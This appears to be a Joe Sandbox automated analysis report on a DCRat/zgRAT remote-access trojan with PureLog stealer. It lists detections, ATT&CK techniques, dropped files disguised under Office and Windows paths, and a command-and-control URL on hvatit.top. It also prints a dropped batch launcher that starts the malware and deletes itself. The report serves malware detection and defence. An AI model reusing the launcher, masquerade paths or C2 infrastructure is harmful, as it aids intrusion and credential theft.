                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainPortServerBrowsermonitor.exe.b30000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000004.00000000.1685720678.0000000000B32000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1648685230.0000000006E22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1648218136.000000000652A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\upfc.exe, type: DROPPED

                                    Remote Access Functionality

                                    Source: Yara matchFile source: 00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: ChainPortServerBrowsermonitor.exe PID: 7464, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: KSFasOVYpBufeMshBMPdEDfTcvlm.exe PID: 7668, type: MEMORYSTR
                                    Source: Yara matchFile source: cuAvoExY41.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainPortServerBrowsermonitor.exe.b30000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000004.00000000.1685720678.0000000000B32000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1648685230.0000000006E22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1648218136.000000000652A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\upfc.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 11 Scripting | 12 Process Injection | 23 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 351 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 251 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Process Injection | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Software Packing | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 3 File and Directory Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 157 System Information Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior graph (figure not reproduced). Behavior Graph ID: 1502155, Sample: cuAvoExY41.exe, Startdate: 31/08/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
cuAvoExY41.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
cuAvoExY41.exe | 57% | Virustotal | | Browse
cuAvoExY41.exe | 100% | Avira | VBS/Runner.VPG
cuAvoExY41.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\EQOQCKPT.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Users\user\Desktop\oOILjGZF.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat | 100% | Avira | BAT/Delbat.C
C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe | 100% | Avira | VBS/Runner.VPG
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\mKRcJKjf.log | 100% | Avira | HEUR/AGEN.1300079
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 100% | Avira | HEUR/AGEN.1323342
C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | 100% | Avira | HEUR/AGEN.1323342
C:\surrogateFontdhcpCommon\upfc.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\vnZStDyM.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\EQOQCKPT.log | 100% | Joe Sandbox ML
C:\Users\user\Desktop\dVTvzLpX.log | 100% | Joe Sandbox ML
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 100% | Joe Sandbox ML
C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe | 100% | Joe Sandbox ML
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 100% | Joe Sandbox ML
C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | 100% | Joe Sandbox ML
C:\surrogateFontdhcpCommon\upfc.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\UxpXqoOQ.log | 100% | Joe Sandbox ML
C:\Users\user\Desktop\vnZStDyM.log | 100% | Joe Sandbox ML
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 100% | Joe Sandbox ML
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 55% | Virustotal | | Browse
C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe | 55% | Virustotal | | Browse
C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 55% | Virustotal | | Browse
C:\Users\user\Desktop\CUGzHwzy.log | 25% | ReversingLabs
C:\Users\user\Desktop\CUGzHwzy.log | 29% | Virustotal | | Browse
C:\Users\user\Desktop\EQOQCKPT.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\EQOQCKPT.log | 69% | Virustotal | | Browse
C:\Users\user\Desktop\UxpXqoOQ.log | 8% | ReversingLabs
C:\Users\user\Desktop\UxpXqoOQ.log | 11% | Virustotal | | Browse
C:\Users\user\Desktop\VDAxqXDQ.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\VDAxqXDQ.log | 27% | Virustotal | | Browse
C:\Users\user\Desktop\dVTvzLpX.log | 8% | ReversingLabs
C:\Users\user\Desktop\dVTvzLpX.log | 11% | Virustotal | | Browse
C:\Users\user\Desktop\ddDNduPc.log | 25% | ReversingLabs
C:\Users\user\Desktop\ddDNduPc.log | 29% | Virustotal | | Browse
C:\Users\user\Desktop\ffpwzeUX.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\ffpwzeUX.log | 27% | Virustotal | | Browse
C:\Users\user\Desktop\mKRcJKjf.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\mKRcJKjf.log | 22% | Virustotal | | Browse
C:\Users\user\Desktop\oOILjGZF.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\oOILjGZF.log | 22% | Virustotal | | Browse
C:\Users\user\Desktop\vnZStDyM.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\vnZStDyM.log | 69% | Virustotal | | Browse
C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe | 55% | Virustotal | | Browse
C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe | 55% | Virustotal | | Browse
C:\surrogateFontdhcpCommon\upfc.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\surrogateFontdhcpCommon\upfc.exe | 55% | Virustotal | | Browse
                                    No Antivirus matches
Source | Detection | Scanner | Label | Link
hvatit.top | 0% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://hvatit.top | 0% | Avira URL Cloud | safe
http://hvatit.top/dbwp.php | 100% | Avira URL Cloud | malware
http://hvatit.top/ | 0% | Avira URL Cloud | safe
http://hvatit.top/dbwp.php | 0% | Virustotal | | Browse
http://hvatit.top/ | 0% | Virustotal | | Browse
http://hvatit.top | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hvatit.top | 80.211.144.156 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://hvatit.top/dbwp.php | true | 0%, Virustotal, Browse; Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://hvatit.top | KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ChainPortServerBrowsermonitor.exe, 00000004.00000002.1713284618.0000000003665000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://hvatit.top/ | KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmp | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
80.211.144.156 | hvatit.top | Italy | | 31034 | ARUBA-ASNIT | true
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1502155
                                    Start date and time:2024-08-31 09:31:05 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 46s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:cuAvoExY41.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:7DDACBFDACD9E8AEACD1B0F2DEA51F4E.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@18/28@1/1
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target KSFasOVYpBufeMshBMPdEDfTcvlm.exe, PID 7668 because it is empty
                                    • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
03:32:12 | API Interceptor | 13787427x Sleep call for process: KSFasOVYpBufeMshBMPdEDfTcvlm.exe modified
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):213
                                                        Entropy (8bit):5.726378981092223
                                                        Encrypted:false
                                                        SSDEEP:6:8mwaFiSM18rK/oWcoEwTXVYC5DryXIQSWWsndJ72bR0kon:xiSM1Z4oZT95OIwndcOko
                                                        MD5:A76D562AD4AF0DD866C56EBE9F280CC0
                                                        SHA1:BA60670D7BF1AC38E1790BCB39E8CF25A3DD09B3
                                                        SHA-256:39547031F6AC9015BDB08130D652F2E09CD17E8E069D4DC6AD3E7803C62123CA
                                                        SHA-512:4BAD21E9310881B514CE883BFCC863345A5D352B7586CF58113FE5FDC0E1335AE0A5C7AB3A5A7BED7816F63BD5DB376A9EE71613B260338332B4AD4693A05897
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:AJg6dGmc3RFgCJebngus6luTN4IcIM7f5aSPt2gjazdaiKfDlpjjUhQYZMsi8JUrUjll1PruAKSGHUvCZE0dnXKXK3zgK7lQfwF8j3MV7yjJPJQFbqJ4S0E6ZNb7aLkCjClVOwdf1fgyyBIBmuEdyr7orIjWcO5vNgjNh50pNoCxUPIXEaVqGGO2E6oFMGCnjukRb5dr3ZQJoJUbALRB3
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%, Browse
                                                        Reputation:low
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with very long lines (604), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):604
                                                        Entropy (8bit):5.892231862694754
                                                        Encrypted:false
                                                        SSDEEP:12:9dNwvE46yoZpDheBIwUrsw5qnDSFBZk/oxFAsBAFaxB/XO4Ku13hhjWC7U:x746pheKwUQw5quDZkSAjie4KihRWC4
                                                        MD5:3B64FC34BD8DF5A1704F13D96B1083AE
                                                        SHA1:2DDB982438D24ACFA0C326A1DD8B96D7278282F8
                                                        SHA-256:883436888CC94B5A86A9AFD365AFDE61110FF0B3DCA7AF5235D895CE1663BAE2
                                                        SHA-512:BC279781682A980F2E4EEBACAE2659ED77C3DF795AA8D0E97B95EB4B42438C036901DA42B1325ED1D33AA219B51C354D59892F288A89E4DA647F65B950EB1A76
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%, Browse
                                                        Reputation:low
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with very long lines (407), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):407
                                                        Entropy (8bit):5.842157912528132
                                                        Encrypted:false
                                                        SSDEEP:12:uB1PVE0q2SpQO2vRxM02bAxQvFwoCcXALCKqdUF+xU:unVM2SpQOWAPDWGALZF+m
                                                        MD5:F262ECC3D2C3B1C61768CCEBE130E31E
                                                        SHA1:E0BA980B42ABD33A895687BB3EABB793D9085C39
                                                        SHA-256:51E6DA0645F9BFFE66376DF48E1C9F96D0F5E458791EDD4D0E4BBB272A0B1013
                                                        SHA-512:2BDD61DECF399A17658739C0CFA56A63B1BD23EC03CD647EF50EAB5350A5E5AA73BF7DB8DA742440939DB40ABCF81A8BE6B8661849CF34371F6973ACE6926C98
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%, Browse
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1179
                                                        Entropy (8bit):5.354252320228764
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
                                                        MD5:074445AD437DEED8A22F11A846280CE2
                                                        SHA1:23025D83D7C33396A5F736FC6F9945976CFCD5D1
                                                        SHA-256:B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
                                                        SHA-512:440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):193
                                                        Entropy (8bit):5.334792111535732
                                                        Encrypted:false
                                                        SSDEEP:6:hCRLuVFOOr+DEmICg/EII5eZNHyKOZG1wkn23feQQdn:CuVEOCDEIYWfWFdn
                                                        MD5:3AF77CECEB99E6684F53483DDDC85B08
                                                        SHA1:9B54746742F134F5B65A5F51E4D61966E238379F
                                                        SHA-256:16AA034A0ADDD6B9B24518636FB922DFE20B26E0A7F6163F96315FCEB8127ACC
                                                        SHA-512:477404110233B6B84EDADA09C417F008F9B0484ACEE47D13013172903882BA2D4BE7D0C27682932DC55F616CCA7C9E9C55085A99F9D8DC7057614DA146624EF6
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KhSi255NBg.bat"
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.323856189774724
                                                        Encrypted:false
                                                        SSDEEP:3:Ae2LfpHTn:ShHT
                                                        MD5:0DD1AFD911C344032B6703C6BBD0BB5A
                                                        SHA1:A07A04670473A7AAAD21F252BFA7A9AE1F15A1F2
                                                        SHA-256:9F1BE71400F5FF487110CF2F51970DC1645D1B46691D07DD65DFF04F9464660D
                                                        SHA-512:B5CE3EF80728FD30EA814133284B4C4CCF08F93CBEC45E2584973810844B51587A7133D759181F184578706FB26D8922D03244F5A015423D217E5CF554D7245E
                                                        Malicious:false
                                                        Preview:lkW8Dx4uLUWI0ynNnaeuTAPCA
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        • Antivirus: Virustotal, Detection: 29%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: TwfUz3FuO7.exe, Detection: malicious, Browse
                                                        • Filename: 9i0GfIAfU7.exe, Detection: malicious, Browse
                                                        • Filename: i3F8zuP3u9.exe, Detection: malicious, Browse
                                                        • Filename: z3yAH0LL5e.exe, Detection: malicious, Browse
                                                        • Filename: 4ra1Fo2Zql.exe, Detection: malicious, Browse
                                                        • Filename: BUKHuBek8M.exe, Detection: malicious, Browse
                                                        • Filename: ugRGgCJhQl.exe, Detection: malicious, Browse
                                                        • Filename: eCGKhYZtgx.exe, Detection: malicious, Browse
                                                        • Filename: czcgyt.exe, Detection: malicious, Browse
                                                        • Filename: trkfmve.exe, Detection: malicious, Browse
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
